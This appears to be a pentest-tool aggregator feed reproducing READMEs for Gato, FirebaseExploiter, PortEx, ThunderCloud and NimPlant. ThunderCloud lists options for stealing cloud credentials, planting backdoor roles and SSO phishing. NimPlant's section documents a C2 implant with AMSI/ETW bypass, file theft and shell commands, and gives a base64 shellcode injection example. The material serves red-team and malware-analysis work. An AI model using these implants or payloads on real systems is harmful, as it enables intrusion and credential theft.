    • GitHub Action Run Log Parsing to identify Self-Hosted Runners
    • Bulk Repo Sparse Clone Features
    • GitHub Action Workflow Parsing
    • Automated Command Execution Fork PR Creation
    • Automated Command Execution Workflow Creation
    • SOCKS5 Proxy Support
    • HTTPS Proxy Support

    Getting Started

    Installation

    Gato supports OS X and Linux with at least Python 3.7.

    In order to install the tool, simply clone the repository and use pip install. We recommend performing this within a virtual environment.

    git clone https://github.com/praetorian-inc/gato
    cd gato
    python3 -m venv venv
    source venv/bin/activate
    pip install .

    Gato also requires that git version 2.27 or above is installed and on the system's PATH. In order to run the fork PR attack module, sed must also be installed and present on the system's path.

    Usage

    After installing the tool, it can be launched by running gato or praetorian-gato.

    We recommend viewing the parameters for the base tool using gato -h, and the parameters for each of the tool's modules by running the following:

    • gato search -h
    • gato enum -h
    • gato attack -h

    The tool requires a GitHub classic PAT in order to function. To create one, log in to GitHub and go to GitHub Developer Settings and select Generate New Token and then Generate new token (classic).

    After creating this token set the GH_TOKEN environment variable within your shell by running export GH_TOKEN=<YOUR_CREATED_TOKEN>. Alternatively, store the token within a secure password manager and enter it when the application prompts you.

    For troubleshooting and additional details, such as installing in developer mode or running unit tests, please see the wiki.

    Documentation

    Please see the wiki. for detailed documentation, as well as OpSec considerations for the tool's various modules!

    Bugs

    If you believe you have identified a bug within the software, please open an issue containing the tool's output, along with the actions you were trying to conduct.

    If you are unsure if the behavior is a bug, use the discussions section instead!

    Contributing

    Contributions are welcome! Please review our design methodology and coding standards before working on a new feature!

    Additionally, if you are proposing significant changes to the tool, please open an issue open an issue to start a conversation about the motivation for the changes.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    FirebaseExploiter - Vulnerability Discovery Tool That Discovers Firebase Database Which Are Open And Can Be Exploitable

    By: noreply@blogger.com (Unknown) β€” April 29th 2023 at 12:30


    FirebaseExploiter is a vulnerability discovery tool that discovers Firebase Database which are open and can be exploitable. Primarily built for mass hunting bug bounties and for penetration testing.

    Features

    • Mass vulnerability scanning from list of hosts
    • Custom JSON data in exploit.json to upload during exploit
    • Custom URI path for exploit

    Usage

    This will display help for the CLI tool. Here are all the required arguments it supports.

    Installation

    FirebaseExploiter was built using go1.19. Make sure you use latest version of Go to install successfully. Run the following command to install the latest version:

    go install -v github.com/securebinary/firebaseExploiter@latest

    Running FirebaseExploiter

    To scan a specific domain to check for Insecure Firebase DB.

    To exploit a Firebase DB to write your own JSON document in it.

    Create your own exploit.json file in proper JSON format to exploit vulnerable Firebase DBs.

    Checking the exploited URL to verify the vulnerability.

    Adding custom path for exploiting Firebase DBs.

    Mass scanning for Insecure Firebase Databases from list of target hosts.

    Exploiting vulnerable Firebase DBs from the list of target hosts.

    License

    FirebaseExploiter is made with love by the SecureBinary team. Any tweaks / community contribution are welcome.


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    PortEx - Java Library To Analyse Portable Executable Files With A Special Focus On Malware Analysis And PE Malformation Robustness

    By: noreply@blogger.com (Unknown) Β·Β noreply@blogger.com (Unknown) β€” April 26th 2023 at 12:30


    PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness, and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.

    Features

    • Reading header information from: MSDOS Header, COFF File Header, Optional Header, Section Table
    • Reading PE structures: Imports, Resources, Exports, Debug Directory, Relocations, Delay Load Imports, Bound Imports
    • Dumping of sections, resources, overlay, embedded ZIP, JAR or .class files
    • Scanning for file format anomalies, including structural anomalies, deprecated, reserved, wrong or non-default values.
    • Visualize PE file structure, local entropies and byteplot of the file with variable colors and sizes
    • Calculate Shannon Entropy and Chi Squared for files and sections
    • Calculate ImpHash and Rich and RichPV hash values for files and sections
    • Parse RichHeader and verify checksum
    • Calculate and verify Optional Header checksum
    • Scan for PEiD signatures, internal file type signatures or your own signature database
    • Scan for Jar to EXE wrapper (e.g. exe4j, jsmooth, jar2exe, launch4j)
    • Extract Unicode and ASCII strings contained in the file
    • Extraction and conversion of .ICO files from icons in the resource section
    • Extraction of version information and manifest from the file
    • Reading .NET metadata and streams (Alpha)

    For more information have a look at PortEx Wiki and the Documentation

    PortexAnalyzer CLI and GUI

    PortexAnalyzer CLI is a command line tool that runs the library PortEx under the hood. If you are looking for a readily compiled command line PE scanner to analyse files with it, download it from here PortexAnalyzer.jar

    The GUI version is available here: PortexAnalyzerGUI

    Using PortEx

    Including PortEx to a Maven Project

    You can include PortEx to your project by adding the following Maven dependency:

    <dependency>
    <groupId>com.github.katjahahn</groupId>
    <artifactId>portex_2.12</artifactId>
    <version>4.0.0</version>
    </dependency>

    To use a local build, add the library as follows:

    <dependency>
    <groupId>com.github.katjahahn</groupId>
    <artifactId>portex_2.12</artifactId>
    <version>4.0.0</version>
    <scope>system</scope>
    <systemPath>$PORTEXDIR/target/scala-2.12/portex_2.12-4.0.0.jar</systemPath>
    </dependency>

    Including PortEx to an SBT project

    Add the dependency as follows in your build.sbt

    libraryDependencies += "com.github.katjahahn" % "portex_2.12" % "4.0.0"

    Building PortEx

    Requirements

    PortEx is build with sbt

    Compile and Build With sbt

    To simply compile the project invoke:

    $ sbt compile

    To create a jar:

    $ sbt package

    To compile a fat jar that can be used as command line tool, type:

    $ sbt assembly

    Create Eclipse Project

    You can create an eclipse project by using the sbteclipse plugin. Add the following line to project/plugins.sbt:

    addSbtPlugin("com.typesafe.sbteclipse" % "sbteclipse-plugin" % "2.4.0")

    Generate the project files for Eclipse:

    $ sbt eclipse

    Import the project to Eclipse via the Import Wizard.

    Donations

    I develop PortEx and PortexAnalyzer as a hobby in my freetime. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

    Author

    Karsten Hahn

    Twitter: @Struppigel

    Mastodon: struppigel@infosec.exchange

    Youtube: MalwareAnalysisForHedgehogs



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    ThunderCloud - Cloud Exploit Framework

    By: noreply@blogger.com (Unknown) β€” March 27th 2023 at 11:30


    Cloud Exploit Framework


    Usage

    python3 tc.py -h

    _______ _ _ _____ _ _
    |__ __| | | | / ____| | | |
    | | | |__ _ _ _ __ __| | ___ _ __| | | | ___ _ _ __| |
    | | | '_ \| | | | '_ \ / _` |/ _ \ '__| | | |/ _ \| | | |/ _` |
    | | | | | | |_| | | | | (_| | __/ | | |____| | (_) | |_| | (_| |
    \_/ |_| |_|\__,_|_| |_|\__,_|\___|_| \_____|_|\___/ \__,_|\__,_|


    usage: tc.py [-h] [-ce COGNITO_ENDPOINT] [-reg REGION] [-accid AWS_ACCOUNT_ID] [-aws_key AWS_ACCESS_KEY] [-aws_secret AWS_SECRET_KEY] [-bdrole BACKDOOR_ROLE] [-sso SSO_URL] [-enum_roles ENUMERATE_ROLES] [-s3 S3_BUCKET_NAME]
    [-conn_string CONNECTION_STRING] [-blob BLOB] [-shared_access_key SHARED_ACCESS_KEY]

    Attack modules of cloud AWS

    optional arguments:
    -h, --help show this help message and exit
    -ce COGNITO_ENDPOINT, --cognito_endpoint COGNITO_ENDPOINT
    to verify if cognito endpoint is vulnerable and to extract credentials
    -reg REGION, --region REGION
    AWS region of the resource
    -accid AWS_ACCOUNT_ID, --aws_account_id AWS_ACCOUNT_ID
    AWS account of the victim
    -aws_key AWS_ACCESS_KEY, --aws_access_key AWS_ACCESS_KEY
    AWS access keys of the victim account
    -aws_secret AWS_SECRET_KEY, --aws_secret_key AWS_SECRET_KEY
    AWS secret key of the victim account
    -bdrole BACKDOOR_ROLE, --backdoor_role BACKDOOR_ROLE
    Name of the backdoor role in victim role
    -sso SSO_URL, --sso_url SSO_URL
    AWS SSO URL to phish for AWS credentials
    -enum_roles ENUMERATE_ROLES, --enumerate_roles ENUMERATE_ROLES
    To enumerate and assume account roles in victim AWS roles
    -s3 S3_BUCKET_NAME, --s3_bucket_name S3_BUCKET_NAME
    Execute upload attack on S3 bucket
    -conn_string CONNECTION_STRING, --connection_string CONNECTION_STRING
    Azure Shared Access key for readingservicebus/queues/blobs etc
    -blob BLOB, --blob BLOB
    Azure blob enumeration
    -shared_access_key SHARED_ACCESS_KEY, --shared_access_key SHARED_ACCESS_KEY
    Azure shared key

    Requirements

    * python 3
    * pip
    * git

    Installation

     - get project `git clone https://github.com/Rnalter/ThunderCloud.git && cd ThunderCloud/`   
    - install [virtualenv](https://virtualenv.pypa.io/en/latest/) `pip install virtualenv`
    - create a python 3.6 local enviroment `virtualenv -p python3.6 venv`
    - activate the virtual enviroment `source venv/bin/activate`
    - install project dependencies `pip install -r requirements.txt`
    - run the tool via `python tc.py --help`

    Running ThunderCloud

    Examples

    python3 tc.py -sso <sso_url> --region <region>
    python3 tc.py -ce <cognito_endpoint> --region <region>


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    PortexAnalyzerGUI - Graphical Interface For PortEx, A Portable Executable And Malware Analysis Library

    By: noreply@blogger.com (Unknown) β€” March 22nd 2023 at 11:30



    Graphical interface for PortEx, a Portable Executable and Malware Analysis Library

    Download

    Releases page

    Features

    • Header information from: MSDOS Header, Rich Header, COFF File Header, Optional Header, Section Table
    • PE Structures: Import Section, Resource Section, Export Section, Debug Section
    • Scanning for file format anomalies
    • Visualize file structure, local entropies and byteplot, and save it as PNG
    • Calculate Shannon Entropy, Imphash, MD5, SHA256, Rich and RichPV hash
    • Overlay and overlay signature scanning
    • Version information and manifest
    • Icon extraction and saving as PNG
    • Customized signature scanning via Yara. Internal signature scans using PEiD signatures and an internal filetype scanner.

    Supported OS and JRE

    I test this program on Linux and Windows. But it should work on any OS with JRE version 9 or higher.

    Future

    I will be including more and more features that PortEx already provides.

    These features include among others:

    • customized visualization
    • extraction and conversion of icons to .ICO files
    • dumping of sections, overlay, resources
    • export reports to txt, json, csv

    Some of these features are already provided by PortexAnalyzer CLI version, which you can find here: PortexAnalyzer CLI

    Donations

    I develop PortEx and PortexAnalyzer as a hobby in my free time. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

    Author

    Karsten Hahn

    Twitter: @Struppigel

    Mastodon: struppigel@infosec.exchange

    Youtube: MalwareAnalysisForHedgehogs

    License

    License



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    NimPlant - A Light-Weight First-Stage C2 Implant Written In Nim

    By: noreply@blogger.com (Unknown) β€” March 20th 2023 at 11:30


    By Cas van Cooten (@chvancooten), with special thanks to some awesome folks:

    • Fabian Mosch (@S3cur3Th1sSh1t) for sharing dynamic invocation implementation in Nim and the Ekko sleep mask function
    • snovvcrash (@snovvcrash) for adding the initial version of execute-assembly & self-deleting implant option
    • Furkan GΓΆksel (@frkngksl) for his work on NiCOFF and Guillaume CaillΓ© (@OffenseTeacher) for the initial implementation of inline-execute
    • Kadir Yamamoto (@yamakadi) for the design work, initial Vue.JS front-end and rusty nimplant, part of an older branch (unmaintained)
    • Mauricio Velazco (@mvelazco), Dylan Makowski (@AnubisOnSec), Andy Palmer (@pivotal8ytes), Medicus Riddick (@retsdem22), Spencer Davis (@nixbyte), and Florian Roth (@cyb3rops), for their efforts in testing the pre-release and contributing detections

    Feature Overview

    • Lightweight and configurable implant written in the Nim programming language
    • Pretty web GUI that will make you look cool during all your ops
    • Encryption and compression of all traffic by default, obfuscates static strings in implant artefacts
    • Support for several implant types, including native binaries (exe/dll), shellcode or self-deleting executables
    • Wide selection of commands focused on early-stage operations including local enumeration, file or registry management, and web interactions
    • Easy deployment of more advanced functionality or payloads via inline-execute, shinject (using dynamic invocation), or in-thread execute-assembly
    • Support for operations on any platform, implant only targeting x64 Windows for now
    • Comprehensive logging of all interactions and file operations
    • Much, much more, just see below :)

    Instructions

    Installation

    • Install Nim and Python3 on your OS of choice (installation via choosenim is recommended, as apt doesn't always have the latest version).
    • Install required packages using the Nimble package manager (cd client; nimble install -d).
    • Install requirements.txt from the server folder (pip3 install -r server/requirements.txt).
    • If you're on Linux or MacOS, install the mingw toolchain for your platform (brew install mingw-w64 or apt install mingw-w64).

    Getting Started

    Configuration

    Before using NimPlant, create the configuration file config.toml. It is recommended to copy config.toml.example and work from there.

    An overview of settings is provided below.

    Category Setting Description
    server ip The IP that the C2 web server (including API) will listen on. Recommended to use 127.0.0.1, only use 0.0.0.0 when you have setup proper firewall or routing rules to protect the C2.
    server port The port that the C2 web server (including API) will listen on.
    listener type The listener type, either HTTP or HTTPS. HTTPS options configured below.
    listener sslCertPath The local path to a HTTPS certificate file (e.g. requested via LetsEncrypt CertBot or self-signed). Ignored when listener type is 'HTTP'.
    listener sslKeyPath The local path to the corresponding HTTPS certificate private key file. Password will be prompted when running the NimPlant server if set. Ignored when listener type is 'HTTP'.
    listener hostname The listener hostname. If not empty (""), NimPlant will use this hostname to connect. Make sure you are properly routing traffic from this host to the NimPlant listener port.
    listener ip The listener IP. Required even if 'hostname' is set, as it is used by the server to register on this IP.
    listener port The listener port. Required even if 'hostname' is set, as it is used by the server to register on this port.
    listener registerPath The URI path that new NimPlants will register with.
    listener taskPath The URI path that NimPlants will get tasks from.
    listener resultPath The URI path that NimPlants will submit results to.
    nimplant riskyMode Compile NimPlant with support for risky commands. Operator discretion advised. Disabling will remove support for execute-assembly, powershell, shell and shinject.
    nimplant sleepMask Whether or not to use Ekko sleep mask instead of regular sleep calls for Nimplants. Only works with regular executables for now!
    nimplant sleepTime The default sleep time in seconds for new NimPlants.
    nimplant sleepJitter The default jitter in percent for new NimPlants.
    nimplant killDate The kill date for Nimplants (format: yyyy-MM-dd). Nimplants will exit if this date has passed.
    nimplant userAgent The user-agent used by NimPlants. The server also uses this to validate NimPlant traffic, so it is recommended to choose a UA that is inconspicuous, but not too prevalent.

    Compilation

    Once the configuration is to your liking, you can generate NimPlant binaries to deploy on your target. Currently, NimPlant supports .exe, .dll, and .bin binaries for (self-deleting) executables, libraries, and position-independent shellcode (through sRDI), respectively. To generate, run python NimPlant.py compile followed by your preferred binaries (exe, exe-selfdelete, dll, raw, or all) and, optionally, the implant type (nim, or nim-debug). Files will be written to client/bin/.

    You may pass the rotatekey argument to generate and use a new XOR key during compilation.

    Notes:

    • NimPlant only supports x64 at this time!
    • The entrypoint for DLL files is Update, which is triggered by DllMain for all entrypoints. This means you can use e.g. rundll32 .\NimPlant.dll,Update to trigger, or use your LOLBIN of choice to sideload it (may need some modifications in client/NimPlant.nim)
    PS C:\NimPlant> python .\NimPlant.py compile all

    * *(# #
    ** **(## ##
    ######## ( ********
    ####(###########************,****
    # ######## ******** *
    .### ***
    .######## ********
    #### ### *** ****
    ######### ### *** *********
    ####### #### ## ** **** *******
    ##### ## * ** *****
    ###### #### ##*** **** .******
    ############### ***************
    ########## **********
    #########**********
    #######********
    _ _ _ ____ _ _
    | \ | (_)_ __ ___ | _ \| | __ _ _ __ | |_
    | \| | | '_ ` _ \| |_) | |/ _` | '_ \| __|
    | |\ | | | | | | | __/| | (_| | | | | |_
    |_| \_|_|_| |_| |_|_| |_|\__ ,_|_| |_|\__|

    A light-weight stage 1 implant and C2 based on Nim and Python
    By Cas van Cooten (@chvancooten)

    Compiling .exe for NimPlant
    Compiling self-deleting .exe for NimPlant
    Compiling .dll for NimPlant
    Compiling .bin for NimPlant

    Done compiling! You can find compiled binaries in 'client/bin/'.

    Compilation with Docker

    The Docker image chvancooten/nimbuild can be used to compile NimPlant binaries. Using Docker is easy and avoids dependency issues, as all required dependencies are pre-installed in this container.

    To use it, install Docker for your OS and start the compilation in a container as follows.

    docker run --rm -v `pwd`:/usr/src/np -w /usr/src/np chvancooten/nimbuild python3 NimPlant.py compile all

    Usage

    Once you have your binaries ready, you can spin up your NimPlant server! No additional configuration is necessary as it reads from the same config.toml file. To launch a server, simply run python NimPlant.py server (with sudo privileges if running on Linux). You can use the console once a Nimplant checks in, or access the web interface at http://localhost:31337 (by default).

    Notes:

    • If you are running your NimPlant server externally from the machine where binaries are compiled, make sure that both config.toml and .xorkey match. If not, NimPlant will not be able to connect.
    • The web frontend or API do not support authentication, so do NOT expose the frontend port to any untrusted networks without a secured reverse proxy!
    • If NimPlant cannot connect to a server or loses connection, it will retry 5 times with an exponential backoff time before attempting re-registration. If it fails to register 5 more times (same backoff logic), it will kill itself. The backoff triples the sleep time on each failed attempt. For example, if the sleep time is 10 seconds, it will wait 10, then 30 (3^1 * 10), then 90 (3^2 * 10), then 270 (3^3 * 10), then 810 seconds before giving up (these parameters are hardcoded but can be changed in client/NimPlant.nim).
    • Logs are stored in the server/logs directory. Each server instance creates a new log folder, and logs are split per console/nimplant session. Downloads and uploads (including files uploaded via the web GUI) are stored in the server/uploads and server/downloads directories respectively.
    • Nimplant and server details are stored in an SQLite database at server/nimplant.db. This data is also used to recover Nimplants after a server restart.
    • Logs, uploaded/downloaded files, and the database can be cleaned up by running NimPlant.py with the cleanup flag. Caution: This will purge everything, so make sure to back up what you need first!
    PS C:\NimPlant> python .\NimPlant.py server     

    * *(# #
    ** **(## ##
    ######## ( ********
    ####(###########************,****
    # ######## ******** *
    .### ***
    .######## ********
    #### ### *** ****
    ######### ### *** *********
    ####### #### ## ** **** *******
    ##### ## * ** *****
    ###### #### ##*** **** .******
    ############### ***************
    ########## **********
    #########**********
    #######********
    _ _ _ ____ _ _
    | \ | (_)_ __ ___ | _ \| | __ _ _ __ | |_
    | \| | | '_ ` _ \| |_) | |/ _` | '_ \| __|
    | |\ | | | | | | | __/| | (_| | | | | |_
    |_| \_|_|_| |_| |_|_| |_|\__ ,_|_| |_|\__|

    A light-weight stage 1 implant and C2 written in Nim and Python
    By Cas van Cooten (@chvancooten)

    [06/02/2023 10:47:23] Started management server on http://127.0.0.1:31337.
    [06/02/2023 10:47:23] Started NimPlant listener on https://0.0.0.0:443. CTRL-C to cancel waiting for NimPlants.

    This will start both the C2 API and management web server (in the example above at http://127.0.0.1:31337) and the NimPlant listener (in the example above at https://0.0.0.0:443). Once a NimPlant checks in, you can use both the web interface and the console to send commands to NimPlant.

    Available commands are as follows. You can get detailed help for any command by typing help [command]. Certain commands denoted with (GUI) can be configured graphically when using the web interface, this can be done by calling the command without any arguments.

    Command arguments shown as [required] <optional>.
    Commands with (GUI) can be run without parameters via the web UI.

    cancel Cancel all pending tasks.
    cat [filename] Print a file's contents to the screen.
    cd [directory] Change the working directory.
    clear Clear the screen.
    cp [source] [destination] Copy a file or directory.
    curl [url] Get a webpage remotely and return the results.
    download [remotefilepath] <localfilepath> Download a file from NimPlant's disk to the NimPlant server.
    env Get environment variables.
    execute-assembly (GUI) <BYPASSAMSI=0> <BLOCKETW=0> [localfilepath] <arguments> Execute .NET assembly from memory. AMSI/ETW patched by default. Loads the CLR.
    exit Exit the server, killing all NimPlants.
    getAv List Antivirus / EDR products on target using WMI.
    getDom Get the domain the target is joined to.
    getLocalAdm List local administrators on the target using WMI.
    getpid Show process ID of the currently selected NimPlant.
    getprocname Show process name of the currently selected NimPlant.
    help <command> Show this help menu or command-specific help.
    hostname Show hostname of the currently selected NimPlant.
    inline-execute (GUI) [localfilepath] [entrypoint] <arg1 type1 arg2 type2..> Execute Beacon Object Files (BOF) from memory.
    ipconfig List IP address information of the currently selected NimPlant.
    kill Kill the currently selected NimPlant.
    list Show list of active NimPlants.
    listall Show list of all NimPlants.
    ls <path> List files and folders i n a certain directory. Lists current directory by default.
    mkdir [directory] Create a directory (and its parent directories if required).
    mv [source] [destination] Move a file or directory.
    nimplant Show info about the currently selected NimPlant.
    osbuild Show operating system build information for the currently selected NimPlant.
    powershell <BYPASSAMSI=0> <BLOCKETW=0> [command] Execute a PowerShell command in an unmanaged runspace. Loads the CLR.
    ps List running processes on the target. Indicates current process.
    pwd Get the current working directory.
    reg [query|add] [path] <key> <value> Query or modify the registry. New values will be added as REG_SZ.
    rm [file] Remove a file or directory.
    run [binary] <arguments> Run a binary from disk. Returns output but blocks NimPlant while running.
    screenshot Take a screenshot of the user's screen.
    select [id] Select another NimPlant.
    shell [command] Execute a shell command.
    shinject (GUI) [targetpid] [localfilepath] Load raw shellcode from a file and inject it into the specified process's memory space using dynamic invocation.
    sleep [sleeptime] <jitter%> Change the sleep time of the current NimPlant.
    upload (GUI) [localfilepath] <remotefilepath> Upload a file from the NimPlant server to the victim machine.
    wget [url] <remotefilepath> Download a file to disk remotely.
    whoami Get the user ID that NimPlant is running as.

    Using Beacon Object Files (BOFs)

    NOTE: BOFs are volatile by nature, and running a faulty BOF or passing wrong arguments or types WILL crash your NimPlant session! Make sure to test BOFs before deploying!

    NimPlant supports the in-memory loading of BOFs thanks to the great NiCOFF project. Running a bof requires a local compiled BOF object file (usually called something like bofname.x64.o), an entrypoint (commonly go), and a list of arguments with their respective argument types. Arguments are passed as a space-seperated arg argtype pair.

    Argument are given in accordance with the "Zzsib" format, so can be either string (alias: z), wstring (or Z), integer (aliases: int or i), short (s), or binary (bin or b). Binary arguments can be a raw binary string or base64-encoded, the latter is recommended to avoid bad characters.

    Some examples of usage (using the magnificent TrustedSec BOFs [1, 2] as an example) are given below. Note that inline-execute (without arguments) can be used to configure the command graphically in the GUI.

    # Run a bof without arguments
    inline-execute ipconfig.x64.o go

    # Run the `dir` bof with one wide-string argument specifying the path to list, quoting optional
    inline-execute dir.x64.o go "C:\Users\victimuser\desktop" Z

    # Run an injection BOF specifying an integer for the process ID and base64-encoded shellcode as bytes
    # Example shellcode generated with the command: msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f base64
    inline-execute /linux/path/to/createremotethread.x64.o go 1337 i /EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7 RxNyb2oAWUGJ2v/VY2FsYy5leGUA b

    # Depending on the BOF, sometimes argument parsing is a bit different using NiCOFF
    # Make sure arguments are passed as expected by the BOF (can usually be retrieved from .CNA or BOF source)
    # An example:
    inline-execute enum_filter_driver.x64.o go # CRASHES - default null handling does not work
    inline-execute enum_filter_driver.x64.o go "" z # OK - arguments are passed as expected

    Push Notifications

    By default, NimPlant support push notifications via the notify_user() hook defined in server/util/notify.py. By default, it implements a simple Telegram notification which requires the TELEGRAM_CHAT_ID and TELEGRAM_BOT_TOKEN environment variables to be set before it will fire. Of course, the code can be easily extended with one's own push notification functionality. The notify_user() hook is called when a new NimPlant checks in, and receives an object with NimPlant details, which can then be pushed as desired.

    Building the frontend

    As a normal user, you shouldn't have to modify or re-build the UI that comes with Nimplant. However, if you so desire to make changes, install NodeJS and run an npm install while in the ui directory. Then run ui/build-ui.py. This will take care of pulling the packages, compiling the Next.JS frontend, and placing the files in the right location for the Nimplant server to use them.

    A word on production use and OPSEC

    NimPlant was developed as a learning project and released to the public for transparency and educational purposes. For a large part, it makes no effort to hide its intentions. Additionally, protections have been put in place to prevent abuse. In other words, do NOT use NimPlant in production engagements as-is without thorough source code review and modifications! Also remember that, as with any C2 framework, the OPSEC fingerprint of running certain commands should be considered before deployment. NimPlant can be compiled without OPSEC-risky commands by setting riskyMode to false in config.toml.

    Troubleshooting

    There are many reasons why Nimplant may fail to compile or run. If you encounter issues, please try the following (in order):

    • Ensure you followed the steps as described in the 'Installation' section above, double check that all dependencies are installed and the versions match
    • Ensure you followed the steps as described in the 'Compilation' section above, and that you have used the chvancooten/nimbuild docker container to rule out any dependency issues
    • Check the logs in the server/logs directory for any errors
    • Try the nim-debug compilation mode to compile with console and debug messages (.exe only) to see if any error messages are returned
    • Try compiling from another OS or with another toolchain to see if the same error occurs
    • If all of the above fails, submit an issue. Make sure to include the appropriate build information (OS, nim/python versions, dependency versions) and the outcome of the troubleshooting steps above. Incomplete issues may be closed without notice.


    ❌